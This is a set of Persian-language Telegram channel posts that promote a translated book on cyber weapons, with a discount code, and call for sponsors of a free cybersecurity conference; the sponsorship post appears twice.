چون نشونههای روشنی میده از اینکه تهدیدات سایبری دیگه محدود به هکهای ساده و سرقت اطلاعات نیستن؛ این تهدیدها میتونن زیرساختها رو فلج کنن، سیاستها رو تحتتأثیر بذارن و در سطح بینالملل ابزاری از جنس قدرت بشن. خوندن این کتاب کمک میکنه دید استراتژیکتری نسبت به مدیریت ریسک، سرمایهگذاری تو امنیت و برنامهریزی دفاعی پیدا کنین.
این ترجمه رو انتشارات فناوران لیان (وابسته به گروه لیان) منتشر کرده و من و دکتر رحیمیان با تعهد کامل روی صحت و انتقال پیام کتاب کار کردیم. اگه دنبال یک منبع قابلاعتنا و درعینحال جذاب برای درک عمیقترِ جنگافزارهای سایبری هستین، این کتاب یه انتخاب ضروریه.
ضمنا برای 50 خرید اول کد تخفیف 25% لحاظ شده که میتونین از طریق لینک زیر و با کد تخفیف book-25، کتاب رو تهیه کنین:
https://liangroup.net/shop/This-Is-How-They-Tell-Me-the-World-Ends
ضمنا حتما بعد از مطالعه کتاب بهم فیدبک بدین.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤7👍5👏2👨💻2⚡1🎉1💯1💔1
ES.pdf
1.5 MB
چند وقتی هست به دنبال برگزاری منظم همایش تخصصی حوزه امنیت هستم. تقریبا یک سالی هم هست روی هزینهها تحقیق کردم و با ارتباطاتی که با دانشجوها و مخاطبین حوزه داشتم، بازخورد خوبی از این موضوع گرفتم.
به دلیل هزینه بالای برگزاری همچین رویدادهایی، تو اولین قدم یک فراخوان عمومی منتشر میکنم برای جذب اسپانسر که جزئیات این طرح اسپانسری به همراه امکانات جانبی، لیست شده. امیدوارم بتونیم با اسپانسری شرکتها این همایش رو بصورت سالانه و با کیفیت و ارائه اساتید برتر حوزه امنیت سایبری برگزار کنم.
ضمنا جذب اسپانسر به دلیل رایگان کردن حضور افراد علاقمند به حوزه امنیت هست.
لطفا در صورت امکان این پست رو شیر کنین یا اگر شرکتهایی میشناسین که توانایی اسپانسری همچین رویدادی رو دارند، براشون ارسال کنین.
با تشکر.
شماره تماس برای جزئیات بیشتر: 09209104151
🔫 🔫 🔫 🔫 🔫 🔫 🔫 🔫 🫡 🔫 🔫
⏩ @CyberWarfar
به دلیل هزینه بالای برگزاری همچین رویدادهایی، تو اولین قدم یک فراخوان عمومی منتشر میکنم برای جذب اسپانسر که جزئیات این طرح اسپانسری به همراه امکانات جانبی، لیست شده. امیدوارم بتونیم با اسپانسری شرکتها این همایش رو بصورت سالانه و با کیفیت و ارائه اساتید برتر حوزه امنیت سایبری برگزار کنم.
ضمنا جذب اسپانسر به دلیل رایگان کردن حضور افراد علاقمند به حوزه امنیت هست.
لطفا در صورت امکان این پست رو شیر کنین یا اگر شرکتهایی میشناسین که توانایی اسپانسری همچین رویدادی رو دارند، براشون ارسال کنین.
با تشکر.
شماره تماس برای جزئیات بیشتر: 09209104151
Please open Telegram to view this post
VIEW IN TELEGRAM
❤16❤🔥3🔥3👏1🥱1💯1🏆1